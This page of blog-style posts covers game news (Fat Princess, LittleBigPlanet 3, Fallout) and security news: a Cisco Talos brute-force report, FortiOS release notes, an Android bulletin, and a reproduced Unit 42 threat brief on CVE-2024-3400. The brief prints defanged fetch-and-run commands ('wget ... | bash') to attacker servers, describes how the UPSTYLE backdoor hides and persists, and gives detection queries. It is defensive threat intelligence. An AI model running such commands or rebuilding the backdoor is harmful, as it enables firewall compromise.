Jump to content
  • SeedTheNet

  • Pages

    Show all categories
    SeedTheNet
    Fat Princess, a quirky and beloved multiplayer action game released by Sony, has left a lasting impression on gamers since its debut. However, the game's discontinuation has sparked a wave of nostalgia and calls from fans for its revival.
    Originally released in 2009 for the PlayStation 3, Fat Princess quickly gained a dedicated following thanks to its unique blend of strategy, humor, and chaotic multiplayer battles. The game's premise, centered around rescuing a princess who can become harder to save as she consumes cake, delighted players and offered a refreshing take on the multiplayer genre.
    Despite its initial success and popularity, Fat Princess eventually faced the unfortunate fate of being discontinued by Sony. This decision left many fans disappointed and longing to revisit the whimsical world of cake-fueled warfare.
    Fans argue that a revival of Fat Princess would be well-received in today's gaming landscape, where multiplayer experiences and unique gameplay concepts continue to thrive. The game's lighthearted tone, strategic depth, and emphasis on teamwork could resonate with a wide audience, offering a refreshing alternative to more mainstream titles.
    Moreover, the advancements in online infrastructure and gaming platforms present an opportunity for Fat Princess to make a triumphant return with enhanced features, improved connectivity, and potential cross-platform play.
    As people have became sensitive to everything in the modern days , would they also be sensitive to the game name and overweight people? But what we should see is another Fat Princess game!.
     
    Fat Princess can be played in RPCS3 for the Nostalgia!
    SeedTheNet
    In January 2024, LittleBigPlanet 3 encountered persistent technical issues that led to the temporary shutdown of its servers for PS4. However, due to ongoing challenges, the decision has been made to keep the servers offline indefinitely. This means that all online services, including access to other players' creations, are no longer available.
    While this is undoubtedly disappointing news for the LittleBigPlanet 3 community, there are some important details to note. User-generated content (UGC) stored locally on your PS4 will still be accessible, allowing you to continue enjoying previously created content. However, any new UGC you create will be limited to local play on your PS4 and cannot be shared online.
    Despite the discontinuation of online services, offline features such as the campaign will remain fully playable. This ensures that players can still experience the core gameplay elements and enjoy the game's content independently of online connectivity.
    It's important for players to be aware of these changes and adjust their gameplay expectations accordingly. While the loss of online services is regrettable, LittleBigPlanet 3 still offers a rich single-player experience and access to locally stored user-generated content.
    The decision to keep the servers offline indefinitely reflects the challenges faced in maintaining online infrastructure and ensuring a stable and enjoyable experience for players. As the gaming landscape evolves, developers and publishers must make decisions that prioritize the long-term viability of their games while also considering the needs and expectations of their player base.
     
    https://www.playstation.com/en-us/legal/gameservers/
    SeedTheNet
    Cisco Talos, along with the Duo Security Research team, extends its gratitude to Brandon White, Phillip Schafer, Mike Moran, and Becca Lynch for their groundbreaking research that has uncovered a concerning trend in cyberattacks.
    Since March 18, 2024, Cisco Talos has been closely monitoring a significant rise in brute-force attacks targeting various entities globally. These attacks are directed towards Virtual Private Network (VPN) services, web application authentication interfaces, and SSH services, posing a serious threat to cybersecurity.
    What's particularly alarming is that these attacks are emanating from TOR exit nodes, as well as a spectrum of other anonymizing tunnels and proxies. This sophisticated approach to conceal the attackers' identities makes it challenging to trace and thwart these malicious activities effectively.
    The repercussions of successful attacks of this nature can be severe, ranging from unauthorized network access and account lockouts to potential denial-of-service (DoS) scenarios. As the frequency of these attacks continues to escalate, it's imperative for organizations to fortify their defenses and remain vigilant against evolving threats.
    While the list of known affected services includes VPN services, web authentication interfaces, and SSH services, it's crucial to note that these attacks may extend to other services as well. Organizations across various sectors must be proactive in implementing robust security measures to mitigate the risks posed by these brute-force attacks.
    Depending on the target environment, successful attacks of this type may lead to unauthorized network access, account lockouts, or denial-of-service conditions. The traffic related to these attacks has increased with time and is likely to continue to rise. Known affected services are listed below. However, additional services may be impacted by these attacks. 
    Cisco Secure Firewall VPN  Checkpoint VPN   Fortinet VPN   SonicWall VPN   RD Web Services  Miktrotik  Draytek  Ubiquiti  The brute-forcing attempts use generic usernames and valid usernames for specific organizations. The targeting of these attacks appears to be indiscriminate and not directed at a particular region or industry. The source IP addresses for this traffic are commonly associated with proxy services, which include, but are not limited to:  
    TOR    VPN Gate   IPIDEA Proxy   BigMama Proxy   Space Proxies   Nexus Proxy   Proxy Rack  Cisco Talos remains committed to monitoring and analyzing these threats, collaborating with industry experts, and providing timely insights and solutions to safeguard digital infrastructures against emerging cyber threats.
    https://blog.talosintelligence.com/large-scale-brute-force-activity-targeting-vpns-ssh-services-with-commonly-used-login-credentials/
    SeedTheNet
    In a surprising twist of events, the recent release of Amazon's highly anticipated Fallout TV show has reignited interest in the iconic Fallout game series. Fans old and new are diving back into the post-apocalyptic world, drawn by the show's captivating narrative and nostalgic allure.
    What sets the Fallout TV show apart is its faithful adaptation of the game universe, capturing the essence of the series and translating it into a compelling visual narrative. This authenticity has resonated with viewers, inspiring many to pick up the controller and experience the wasteland firsthand.
    For existing fans, the show serves as a nostalgic reminder of their adventures in the Fallout universe, while newcomers are intrigued by the unique blend of retro-futurism, dark humor, and moral dilemmas that define the games.
    The connection between the TV show and the games has created a symbiotic relationship, with each medium complementing the other to create a richer, more immersive experience. As discussions and excitement around Fallout continue to grow, the community is buzzing with theories, fan creations, and shared experiences.
    With the Fallout TV show acting as a catalyst, the games are once again in the spotlight, drawing in players old and new to explore the radioactive ruins, face off against mutated creatures, and navigate the complexities of a post-nuclear world.
    Looking at the SteamDB.info website , it shows that there is a GAIN of +139.0%  which brought around 35k players more
    Fallout 4 : 

    Fallout 3 saw a small jump : 

    Fallout 76 124% which is around 15k players more

     
    The Fallout 4 next-gen upgrade is slated for release on April 25
    SeedTheNet
    When it comes to cybersecurity, staying ahead of the game is crucial. Palo Alto Networks, along with Unit 42, is actively monitoring and responding to the latest security challenges that could affect networks worldwide. One such challenge is the critical command injection vulnerability known as CVE-2024-3400, which poses a serious risk to users of Palo Alto Networks PAN-OS software.
    This article takes a closer look at CVE-2024-3400, emphasizing its severity with a CVSS score of 10.0
     
    A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
    Fixes for PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 are in development and are expected to be released by April 14, 2024. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability. All other versions of PAN-OS are also not impacted.

    Required Configuration for Exposure
    This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both) and device telemetry enabled.
    You can verify whether you have a GlobalProtect gateway or GlobalProtect portal configured by checking for entries in your firewall web interface (Network > GlobalProtect > Gateways or Network > GlobalProtect > Portals) and verify whether you have device telemetry enabled by checking your firewall web interface (Device > Setup > Telemetry).
     
    Severity: CRITICAL
    CVSSv4.0 Base Score: 10 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/AU:Y/R:U/V:C/RE:M/U:Red)
    Exploitation Status
    Palo Alto Networks is aware of a limited number of attacks that leverage the exploitation of this vulnerability.
    More information about the vulnerability's exploitation in the wild can be found in the Unit 42 threat brief: https://unit42.paloaltonetworks.com/cve-2024-3400/.
    Weakness Type
    CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection')
    Solution
    This issue will be fixed in hotfix releases of PAN-OS 10.2.9-h1 (ETA: By 4/14), PAN-OS 11.0.4-h1 (ETA: By 4/14), and PAN-OS 11.1.2-h3 (ETA: By 4/14), and in all later PAN-OS versions.
    Workarounds and Mitigations
    Recommended Mitigation: Customers with a Threat Prevention subscription can block attacks for this vulnerability by enabling Threat ID 95187 (introduced in Applications and Threats content version 8833-8682).
    In addition to enabling Threat ID 95187, customers must ensure vulnerability protection has been applied to their GlobalProtect interface to prevent exploitation of this issue on their device. Please see https://live.paloaltonetworks.com/t5/globalprotect-articles/applying-vulnerability-protection-to-globalprotect-interfaces/ta-p/340184 for more information.
    If you are unable to apply the Threat Prevention based mitigation at this time, you can still mitigate the impact of this vulnerability by temporarily disabling device telemetry until the device is upgraded to a fixed PAN-OS version. Once upgraded, device telemetry should be re-enabled on the device.
    Please see the following page for details on how to temporarily disable device telemetry: https://docs.paloaltonetworks.com/pan-os/11-0/pan-os-admin/device-telemetry/device-telemetry-configure/device-telemetry-disable.
    Executive Summary
    Palo Alto Networks and Unit 42 are engaged in tracking activity related to CVE-2024-3400 and are working with external researchers, partners and customers to share information transparently and rapidly.
    A critical command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. The vulnerability, assigned CVE-2024-3400, has a CVSS score of 10.0.
    This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0 and PAN-OS 11.1 firewall configurations with a GlobalProtect gateway and device telemetry enabled. This issue does not affect cloud firewalls (Cloud NGFW), Panorama appliances or Prisma Access. For up-to-date information about affected products and versions, please refer to the Palo Alto Networks Security Advisory on this issue.

    Palo Alto Networks is aware of malicious exploitation of this issue. We are tracking the initial exploitation of this vulnerability under the name Operation MidnightEclipse, as we assess with high confidence that known exploitation we’ve analyzed thus far is limited to a single threat actor. We also assess that additional threat actors may attempt exploitation in the future.
    This threat brief will cover information about the vulnerability and what we know about post-exploitation. We will share interim guidance to mitigate the vulnerability, though readers should also refer to the security advisory for specific product version information and remediation guidance. We will continue to update this threat brief as more information becomes available.
    If you believe your firewall has been compromised, please reach out to Palo Alto Networks support.
    This issue will be fixed in an upcoming release of PAN-OS 10.2, PAN-OS 11.0, PAN-OS 11.1 and all later PAN-OS versions by ETA April 14, 2024.
    As a matter of best practice, Palo Alto Networks recommends that you monitor your network for abnormal activity and investigate any unexpected network activity.
    We would like to thank Volexity for finding this issue and their continuing coordination and partnership. Please reference Volexity’s blog for their analysis.
    Palo Alto Networks customers receive protections from and mitigations for CVE-2024-3400 and malware used in post-exploitation activity in the following ways:
    Palo Alto Networks recommends customers with a Threat Prevention subscription block attacks for this vulnerability by enabling Threat ID 95187 (introduced in Applications and Threats content version 8833-8682). In addition to enabling Threat ID 95187, customers must ensure vulnerability protection has been applied to their GlobalProtect interface to prevent exploitation of this issue on their device. Please see the relevant LIVEcommunity article for more information.
    If you are unable to apply the Threat Prevention based mitigation at this time, you can still mitigate the impact of this vulnerability by temporarily disabling device telemetry until the device is upgraded to a fixed PAN-OS version. Once upgraded, device telemetry should be re-enabled on the device.
    The Managed Threat Hunting section below includes XQL queries that can be used to search for signs of exploitation of this CVE.
    The Unit 42 Incident Response team can also be engaged to help with a compromise or to provide a proactive assessment to lower your risk.
    Vulnerabilities Discussed CVE-2024-3400 Table of Contents
    Details of the Vulnerability
    Current Scope of the Attack
    Interim Guidance
    Unit 42 Managed Threat Hunting Queries
    Conclusion
    Palo Alto Networks Product Protections for CVE-2024-3400
    Next-Generation Firewalls and Prisma Access With Advanced Threat Prevention
    Cortex XDR, XSIAM and the Unified Cloud Agent
    Cortex Xpanse and XSIAM ASM Module
    Indicators of Compromise
    UPSTYLE Backdoor
    Command and Control Infrastructure
    Hosted Python Backdoor
    Observed Commands
    Additional Resources
    Details of the Vulnerability
    A command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0 and PAN-OS 11.1 firewall configurations with both a GlobalProtect gateway and device telemetry enabled.
    You can verify whether you have these features configured by checking for entries in your firewall web interface. Our security advisory includes a link to further instructions on how to temporarily disable device telemetry.
    Palo Alto Networks is aware of targeted attacks that leverage this vulnerability. The next section covers details of the post-exploitation activity we’ve observed.
    Current Scope of the Attack
    As part of the activity observed in Operation MidnightEclipse, after exploitation, the threat actor created a cronjob that would run every minute to access commands hosted on an external server that would execute via bash, as seen in the following command:
    wget -qO- hxxp://172.233.228[.]93/policy | bash We were unable to access the commands executed via this URL. However, we believe this URL was used to deploy a second Python-based backdoor, which our colleagues at Volexity referred to as UPSTYLE.
    The UPSTYLE backdoor uploaded to the firewall was hosted at hxxp://144.172.79[.]92/update.py, but we saw a similar backdoor hosted at nhdata.s3-us-west-2.amazonaws[.]com. According to the HTTP headers, it appears the threat actor last modified it on April 7, 2024.
      1 2 3 4 5 6 7 8 9 10 11 12 13 Accept-Ranges: bytes   Content-Length: 5187   Content-Type: application/octet-stream   Date: Thu, 11 Apr 2024 16:12:16 GMT   Etag: "6612443d-1443"   Last-Modified: Sun, 07 Apr 2024 06:59:09 GMT   Server: nginx/1.18.0 (Ubuntu) The update.py file hosted at 144.172.79[.]92 has a SHA256 value of 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac. This file is a backdoor that has multiple layers.
    First, update.py writes another Python script to the following location:
    [snip]/site-packages/system.pth The Python script written to system.pth Base64 decodes an embedded Python script and executes it. This embedded Python script has two functions named protect and check, which are called in that order. The protect function sends a SIGTERM signal and writes the contents of the system.pth file back to itself, likely as a persistence mechanism. The check function will read /proc/self/cmdline to see if it is running as monitor mp before running another Base64 embedded Python script, which is the functional backdoor.
    The Python script run by system.pth has a function named __main that will run in a thread. This function first reads the contents of the following file, along with its access and modified times:
    [snip]/css/bootstrap.min.css It then enters an infinite loop that iterates once every two seconds, reading in the following file:
    [snip]/sslvpn_ngx_error.log The script will then iterate through each line of the file and search the line for the threat actor's command using the following regular expression:
    img\[([a-zA-Z0-9+/=]+)\] If the above regular expression matches, the script will Base64 encode the contents of the command and run it using the popen method within Python's OS module. The lines of the sslvpn_ngx_error.log file that do not match the regular expression are written back to the file, which essentially prunes the lines that contain commands from persisting in the sslvpn_ngx_error.log file for later analysis.
    After running the command, the script writes the output of the command to the following file:
    [snip]/css/bootstrap.min.css The script will then create another thread that runs a function called restore. The restore function takes the original content of the bootstrap.min.css file, as well as the original access and modified times, sleeps for 15 seconds and writes the original contents back to the file and sets the access and modified times to their originals. The point of this function is to avoid leaving the output of the commands available for analysis. Also, this suggests that the threat actor has automation built into the client side of this backdoor, as they only have 15 seconds to grab the results before the backdoor overwrites the file.
    Using the initial backdoor in the crontab, we have evidence of a handful of the commands the threat actor ran on the firewall. The commands include copying configuration files to the web application folder and exfiltrating them via HTTP requests to those files. The following IP address was seen attempting to access a specific configuration file copied to this folder, which we believe is a VPN used by the threat actor:
    66.235.168[.]222 We also observed the threat actor running another command to receive commands from a slightly different URL as the cronjob backdoor:
    wget -qO- hxxp://172.233.228[.]93/patch|bash Lastly, the threat actor cleaned up after themselves by removing all files associated with the backdoors and clearing their cronjobs.
    Interim Guidance
    Please refer to the Palo Alto Networks security advisory on CVE-2024-3400 for the most current interim guidance for mitigating the vulnerability.
    Unit 42 Managed Threat Hunting Queries
    The Unit 42 Managed Threat Hunting team continues to track any attempts to exploit this CVE across our customers, using Cortex XDR and the XQL queries below. Cortex XDR customers can also use these XQL queries to search for signs of exploitation.
      1 2 3 4 // Description: Search for domain IOC in raw NGFW logs dataset = panw_ngfw_url_raw | filter url_domain ~= ".*nhdata.s3-us-west-2.amazonaws.com" | fields _time, log_source_name, action, app, url_domain, uri, url_category, source_ip, source_port, dest_ip, dest_port, protocol, rule_matched, rule_matched_uuid  
      1 2 3 4 5 // Description: Detect hits for the specific prevention signature for CVE-2024-3400 config case_sensitive = false | dataset = panw_ngfw_threat_raw | filter threat_id = "95187" | fields _time, log_source_name, action, app_category, app_sub_category, threat_id, threat_name, source_ip, source_port, dest_ip, dest_port, *  
      1 2 3 4 5 // Description: Hits for known IOCs in NGFW traffic config case_sensitive = false | dataset = panw_ngfw_traffic_raw | filter source_ip in ("66.235.168.222", "144.172.79.92", "172.233.228.93") or dest_ip in ("66.235.168.222", "144.172.79.92", "172.233.228.93") | fields _time, log_source_name, action, action_source, app, bytes_sent, bytes_received, bytes_total, source_ip, source_port, dest_ip, dest_port, protocol, rule_matched, rule_matched_uuid, session_end_reason  
      1 2 3 4 5 6 // Description: Hits for known IOCs in XDR telemetry and NGFW telemetry (assuming proper integration of NGFW) config case_sensitive = false | dataset = xdr_data | filter event_type = ENUM.STORY | filter action_remote_ip in ("172.233.228.93", "66.235.168.222", "144.172.79.92") OR dns_query_name ~= ".nhdata.s3-us-west-2.amazonaws.com" OR action_external_hostname ~= ".nhdata.s3-us-west-2.amazonaws.com" | fields _time, agent_hostname, actor_process_image_name, action_local_ip, action_remote_ip, action_remote_port, dns_query_name, action_external_hostname  
    Conclusion
    The security advisory will continue to provide up to date information on impacts to Palo Alto Networks products and recommended mitigations. We will continue to update this threat brief with information on exploitation.
    Again, Palo Alto Networks would like to thank Volexity for finding this issue and their continuing coordination and partnership. Please reference Volexity’s blog for their analysis.
    Palo Alto Networks has shared our findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.
    Protections and mitigations for the observed exploitation activity are below and will be updated as more become available.
    Palo Alto Networks Product Protections for CVE-2024-3400
    Palo Alto Networks customers can leverage a variety of product protections and updates to identify and defend against this threat.
    If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:
    North America Toll-Free: 866.486.4842 (866.4.UNIT42) EMEA: +31.20.299.3130 APAC: +65.6983.8730 Japan: +81.50.1790.0200 Next-Generation Firewalls and Prisma Access With Advanced Threat Prevention
    Next-Generation Firewall with the Advanced Threat Prevention security subscription can help block exploitation of CVE-2024-3400 via Threat Prevention signature: 95187.
    Cortex XDR, XSIAM and the Unified Cloud Agent 
    Cortex XDR and XSIAM agents and analytics help protect and detect against post-exploitation activity if an attacker tries to enumerate or laterally move to other assets.
    Cortex Xpanse and XSIAM ASM Module
    Cortex Xpanse has the ability to identify exposed Palo Alto Networks GlobalProtect devices on the public internet and escalate these findings to defenders. Customers can enable alerting on this risk by ensuring that the Palo Alto Networks GlobalProtect Attack Surface Rule is enabled. Identified findings can either be viewed in the Threat Response Center or in the incident view of Expander. These findings are also available for Cortex XSIAM customers who have purchased the ASM module.
    Indicators of Compromise
    UPSTYLE Backdoor
    Update.py 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac 5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078 Command and Control Infrastructure
    172.233.228[.]93 hxxp://172.233.228[.]93/policy hxxp://172.233.228[.]93/patch 66.235.168[.]222 Hosted Python Backdoor
    144.172.79[.]92 nhdata.s3-us-west-2.amazonaws[.]com Observed Commands
    wget -qO- hxxp://172.233.228[.]93/patch|bash wget -qO- hxxp://172.233.228[.]93/policy | bash Additional Resources
    CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect Gateway – Palo Alto Networks Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400) – Volexity Palo Alto Networks Releases Guidance for Vulnerability in PAN-OS, CVE-2024-3400 – Cybersecurity and Infrastructure Security Agency (CISA) Updated April 12, 2024, at 10:15 a.m. PT to add Cortex XDR and XSIAM product protections, as well as Additional Resources. 
    Updated April 12, 2024, at 12:45 a.m. PT to add Cortex Xpanse product protections.
    UPDATE :
    Unfortunately, Palo Alto Networks updated their advisory today to warn that previously shared mitigations have been found to be ineffective at protecting devices from the vulnerability.
    "Earlier versions of this advisory, disabling device telemetry was listed as a secondary mitigation action. Disabling device telemetry is no longer an effective mitigation," reads an update to Palo Alto's advisory.
    "Device telemetry does not need to be enabled for PAN-OS firewalls to be exposed to attacks related to this vulnerability."
    Therefore, the best solution is to install the latest PAN-OS software update to fix the vulnerability.
    Additionally, if you have an active 'Threat Prevention' subscription, you can block ongoing attacks by activating 'Threat ID 95187' threat prevention-based mitigation.
    https://unit42.paloaltonetworks.com/cve-2024-3400/
    SeedTheNet
    We are pleased to inform you that Fortinet has released the latest update for FortiOS 7.0, version 7.0.15. This update brings a range of enhancements, optimizations, and security updates to further strengthen your network infrastructure's resilience and performance.
    Key highlights of the FortiOS 7.0.15 update include:
    Resolved issues
    7.0.15   The following issues have been fixed in version 7.0.15. To inquire about a particular bug, please contact Customer Service & Support. Application Control
    Bug ID
    Description
    952307
    FG-400F sees increased packet loss when using an application list in the policy.
    FortiGate 6000 and 7000 platforms
    Bug ID
    Description
    949175
    During FIM failover from FIM2 to FIM1, the NP7 PLE sticks on a cache invalidation, stopping traffic.
    HA
    Bug ID
    Description
    869557
    Upgrading or re-uploading an image to the HA secondary node causes the OS to be un-certified.
    1011674
    Upgrading from 7.0.14 GA to 7.2.8 GA from an HA secondary node fails with BIOS security level 2. The new image is unrecognized as un-certified and aborts the upgrade process. The HA cluster is unaffected.
    Hyperscale
    Bug ID
    Description
    936747
    Connections per second (CPS) performance of SIP sessions accepted by hyperscale firewall policies with EIM and EIF disabled that include overload with port block allocation (PBA) GCN IP pools is lower than expected.
    949188
    ICMP reply packets are dropped by FortiOS in a NAT64 hyperscale policy.
    961684
    When DoS policies are used and the system is under stress conditions, BGP might go down.
    976972
    New primary can get stuck on failover with HTTP CC sessions.
    Intrusion Prevention
    Bug ID
    Description
    968367
    IPS engine high memory usage can cause FortiOS to go into conserve mode.
    Limitations
    Bug ID
    Description
    961992
    The buffer and description queue limitation of Marvell switch ports causes a performance limitation.
    Routing
    Bug ID
    Description
    935370
    SD-WAN performance SLA tcp-connect probes clash with user sessions.
    Security Fabric
    Bug ID
    Description
    887967
    Fabric crashes when synchronizing objects with names longer than 64 characters.
    988526
    Address object changes from the CLI of the root FortiGate in Security Fabric are not synchronized with downstream devices.
    SSL VPN
    Bug ID
    Description
    821240
    SSLVPNVD 11 signal failure due to attempt to read out of bounds memory.
    System
    Bug ID
    Description
    828557
    FortiGate as DHCP relay is not showing a DHCP decline in the debugs when there is an IP conflict in the network.
    888941
    Some sessions are still reported as offloaded when auto-asic-offload is disabled.
    910829
    Degraded traffic bandwidth for download passing from 10G to 1G interfaces.
    937500, 969083
    FortiOS does not accept an installation script from FortiManager when creating an extender-profile with login-password-change is set to yes.
    938449
    In the 4.19 kernel, when a neighbor's MAC is changed, the session and IPsec tunnel cannot be flushed from the NPU.
    943090
    Buffer and description queue limitation of Marvell switch port will cause a performance limitation.
    949481
    The tx_collision_err counter in the FortiOS CLI keeps increasing on both 10G SFP+ X1 and X2 interfaces.
    956107
    On the FortiGate 400F and 600F, the buffer and description queue limitation of the Marvell switch port causes a performance limitation.
    984696
    Network usage is not accurately reported by the get system performance status command.
    986698
    The NP7 should use the updated MAC address from the ARP table to forward traffic to the destination server.
    1001938
    Support Kazakhstan time zone change to a single time zone, UTC+5.
    User & Authentication
    Bug ID
    Description
    1000108
    Guest-management administrators cannot see or print guest user passwords in plain text; the password is masked as ENC XXXX string.
    WiFi Controller
    Bug ID
    Description
    821320
    FG-1800F drops wireless client traffic in L2 tunneled VLAN with capwap-offload enabled.
     
    We strongly recommend applying this update to your Fortinet devices to benefit from the latest features, security enhancements, and performance optimizations. Keeping your systems up to date is crucial in maintaining a secure and efficient network environment.
    For more information about the update process, release notes, and support resources, please visit the Fortinet Support Portal or reach out to Fortinet dedicated support team for assistance.
    SeedTheNet
    Google Issues Security Warning for Pixel Devices: Critical Vulnerabilities Detected
    Google has issued a security advisory to Pixel users, alerting them to two high severity vulnerabilities that may be under limited, targeted exploitation. These vulnerabilities, identified as CVE-2024-29745 and CVE-2024-29748, pose significant risks and require immediate attention.
    The first vulnerability, CVE-2024-29745, is classified as an information disclosure vulnerability in the bootloader component. Bootloaders play a crucial role in the boot process of devices, ensuring that essential operating system data is loaded into memory during startup. Exploitation of this vulnerability could lead to unauthorized access to sensitive information stored on the device.
    The second vulnerability, CVE-2024-29748, is an elevation of privilege (EoP) vulnerability found in the Pixel firmware. Firmware serves as device-specific software that provides fundamental machine instructions necessary for hardware functionality and interaction with other software components. If exploited, this vulnerability could allow attackers to escalate their privileges on the device, potentially gaining control over critical system functions.
    To address these security risks, Google has released a security patch with a designated level of 2024-04-05 for Pixel devices. It is imperative for Pixel users to apply this security patch promptly to protect their devices from potential exploitation and mitigate the associated risks.
    Google emphasizes the importance of keeping devices up to date with the latest security patches and software updates to ensure optimal security posture and protect against emerging threats. Users are encouraged to enable automatic updates and regularly check for security patches to stay protected from vulnerabilities and cyber threats.
    In conclusion, the detection and prompt mitigation of these high severity vulnerabilities underscore Google's commitment to prioritizing user security and addressing potential security risks proactively. Pixel users are urged to take immediate action by applying the latest security patch to safeguard their devices and mitigate the risks associated with these vulnerabilities.
    ------------------
    Android Security Bulletin—April 2024
      Published April 1, 2024 The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2024-04-05 or later address all of these issues. To learn how to check a device's security patch level, see Check and update your Android version.
    Android partners are notified of all issues at least a month before publication. Source code patches for these issues will be released to the Android Open Source Project (AOSP) repository in the next 48 hours. We will revise this bulletin with the AOSP links when they are available.
    The most severe of these issues is a high security vulnerability in the System component that could lead to local escalation of privilege with no additional execution privileges needed. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.
    Refer to the Android and Google Play Protect mitigations section for details on the Android security platform protections and Google Play Protect, which improve the security of the Android platform.
    Android and Google service mitigations
    This is a summary of the mitigations provided by the Android security platform and service protections such as Google Play Protect. These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android.
    Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible. The Android security team actively monitors for abuse through Google Play Protect and warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play. 2024-04-01 security patch level vulnerability details
    In the sections below, we provide details for each of the security vulnerabilities that apply to the 2024-04-01 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates.
    Framework
    The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed.
    CVE References Type Severity Updated AOSP versions CVE-2024-23710 A-311374917 EoP High 13, 14 CVE-2024-23713 A-305926929 EoP High 12, 12L, 13, 14 CVE-2024-0022 A-298635078 ID High 13, 14 CVE-2024-23712 A-304983146 DoS High 12, 12L, 13, 14 System
    The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed.
    CVE References Type Severity Updated AOSP versions CVE-2024-23704 A-299931761 EoP High 13, 14 CVE-2023-21267 A-218495634 [2] [3] ID High 12, 12L, 13, 14 CVE-2024-0026 A-308414141 DoS High 12, 12L, 13, 14 CVE-2024-0027 A-307948424 DoS High 12, 12L, 13, 14 Google Play system updates
    There are no security issues addressed in Google Play system updates (Project Mainline) this month.
    2024-04-05 security patch level vulnerability details
    In the sections below, we provide details for each of the security vulnerabilities that apply to the 2024-04-05 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID.
    MediaTek components
    These vulnerabilities affect MediaTek components and further details are available directly from MediaTek. The severity assessment of these issues is provided directly by MediaTek.
    CVE References Severity Subcomponent CVE-2024-20039 A-323462011
    M-MOLY01240012 * High Modem Protocol CVE-2024-20040 A-323465955
    M-ALPS08360153 * High wlan firmware CVE-2023-32890 A-323469023
    M-MOLY01183647 * High Modem EMM Widevine
    This vulnerability affects Widevine components and further details are available directly from Widevine. The severity assessment of this issue is provided directly by Widevine.
    CVE References Severity Subcomponent CVE-2024-0042 A-312543200 * High Widevine DRM Qualcomm components
    These vulnerabilities affect Qualcomm components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.
    CVE References Severity Subcomponent CVE-2024-21468 A-318393412
    QC-CR#3614610 [2] High Kernel CVE-2024-21472 A-318393741
    QC-CR#3626401 High Kernel Qualcomm closed-source components
    These vulnerabilities affect Qualcomm closed-source components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.
    CVE References Severity Subcomponent CVE-2023-28582 A-299147008 * Critical Closed-source component CVE-2023-28547 A-303101227 * High Closed-source component CVE-2023-33023 A-303101376 * High Closed-source component CVE-2023-33084 A-299146258 * High Closed-source component CVE-2023-33086 A-299146962 * High Closed-source component CVE-2023-33095 A-299146595 * High Closed-source component CVE-2023-33096 A-299146025 * High Closed-source component CVE-2023-33099 A-303101372 * High Closed-source component CVE-2023-33100 A-303101224 * High Closed-source component CVE-2023-33101 A-303101066 * High Closed-source component CVE-2023-33103 A-299146257 * High Closed-source component CVE-2023-33104 A-299146882 * High Closed-source component CVE-2023-33115 A-303101567 * High Closed-source component CVE-2024-21463 A-318393254 * High Closed-source component Common questions and answers
    This section answers common questions that may occur after reading this bulletin.
    1. How do I determine if my device is updated to address these issues?
    To learn how to check a device's security patch level, see Check and update your Android version.
    Security patch levels of 2024-04-01 or later address all issues associated with the 2024-04-01 security patch level. Security patch levels of 2024-04-05 or later address all issues associated with the 2024-04-05 security patch level and all previous patch levels. Device manufacturers that include these updates should set the patch string level to:
    [ro.build.version.security_patch]:[2024-04-01] [ro.build.version.security_patch]:[2024-04-05] For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2024-04-01 security patch level. Please see this article for more details on how to install security updates.
    2. Why does this bulletin have two security patch levels?
    This bulletin has two security patch levels so that Android partners have the flexibility to fix a subset of vulnerabilities that are similar across all Android devices more quickly. Android partners are encouraged to fix all issues in this bulletin and use the latest security patch level.
    Devices that use the 2024-04-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins. Devices that use the security patch level of 2024-04-05 or newer must include all applicable patches in this (and previous) security bulletins. Partners are encouraged to bundle the fixes for all issues they are addressing in a single update.
    3. What do the entries in the Type column mean?
    Entries in the Type column of the vulnerability details table reference the classification of the security vulnerability.
